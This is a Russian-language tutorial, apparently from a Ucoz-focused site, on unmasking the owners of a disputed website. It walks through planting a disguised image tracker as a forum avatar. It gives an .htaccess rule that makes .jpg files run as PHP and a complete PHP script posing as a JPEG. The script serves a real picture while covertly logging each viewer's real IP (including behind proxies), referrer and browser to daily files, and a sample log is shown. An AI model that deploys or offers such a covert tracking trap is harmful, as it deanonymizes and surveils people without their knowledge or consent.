| Бывают ситуации когда необходимо знать местоположение человека доступа к сайту которого Вы не имеете. Например сайт который разместил наш почтовый ящик
к которому не имеет доступа тем самым фальсифицирует сайт оригинал и построен в системе Ucoz.
Почему Ucoz? Ну вот нравится этот конструктор! Администрация сайта посчитала что имеет полное право называться специалистами
в области компьютерной безопасности и пренебрегла основами уважения...ну что же... Итак:
После изучения сайта можно было заметить что система позволяет вставлять аватары с других сайтов.
Странно, классическая схема...
Хотя практически все специалисты знают об этом... 1.Открываем бесплатный хостинг с где можно использовать php и а также изменять .htaccess
2.Создаем папочку например people и загружаем туда фоту в формате png
естественно помним что размер должен быть в пределах допустимых сайтом.
Называем наше фото img.png
3.Создаем/модифицируем файл .htaccess
добавляем строчку Code AddType application/x-httpd-php .jpg
Тем самым мы даем понять серверу Apache что файлы с расширением .jpg
являются не чем иным как исполняемыми php файлами.
4.Создаем файл index.php что бы товарищ если хватит ума не смог увидеть содержимое папки. 5.Создаем файл например 12839.jpg (цифры для правдоподобности)
Открыв его в текстовом редакторе пишем php код. Code
<?php //Это исполняемый php файл
Header("Content-type: image/png"); //заголовок отдаем как png тип то есть нашу фоту
$im = ImageCreateFromPng("img.png"); //открываем наш файл img.png c фотой
ImagePng($im); //Отдаем его браузеру
ImageDestroy($im); //уничтожаем
$format="d.m.Y"; $date=date($format); //нам нужно знать дату посещения чтобы создать и писать в этот файл
// Настройка часов так как сервер может находиться в другом часовом поясе
$hourdiff = "0"; // 0 если разница серверного времени и вашего совпадает
$timeadjust = ($hourdiff * 60 * 60); //смещение во времени
$melbtime = date(" H:i",time() + $timeadjust); //запоминаем в переменную для дальнейшего использования
$file = fopen ($date.".txt","a"); //открываем наш файл куда будем писать инфу (файл будет создаваться каждый день новый)
//Некоторые горе специалисты любят прятаться за прокси серверами
//Нам нужен реальный адрес
function GetRealIp()
{
if (!empty($_SERVER['HTTP_CLIENT_IP']))
{
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ip=$_SERVER['REMOTE_ADDR'];
}
return $ip;
}
//узнаем реферальную страницу где находится пользователь
$rrf = $_SERVER["HTTP_REFERER"];
//для полноты информации узнаем какой браузер использует пользователь
$agent=$_SERVER["HTTP_USER_AGENT"];
//записываем информацию в файл
if ( !$file ) { } else
{
fputs ( $file, $date.'|'.$melbtime.'|'.GetRealIp().'|'.$rrf.'|'.$_SERVER['REQUEST_URI'].'|'.$agent.'
');
}
fclose ($file);//закрываем файл
//закрываем php код
?>
При регистрации на сайте указываем адрес картинки http://myhost.com/people/12839.jpg
Отчеты читаем не заходя на сервер под логином по адресу http://myhost.com/people/22.03.2010.txt
22.03.2010.txt - конкретная дата отчета. Пример отчета:
*****
22.03.2010| 04:12|255.255.255.255|http://******/forum/****|/people/12839.jpg|Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/10.10
***** Дата/время/Ip/рефферал/файл вызова/браузер,операционная система и т.д. Далее информация собирается и анализируется например в течении месяца.
Законно ли это?
А законен ли обман пользователей и поисковых систем со стороны владельцев сайта? Продолжение следует... P.S. Господа...имейте уважение друг к другу! Код написан для HOD32.org.ua.
Хочешь скопировать к себе на сайт и предупредить пользователей?
Не забудь поставить на hod32.org.ua обратную ссылку.
Поверь, это в твоих интересах.
| 
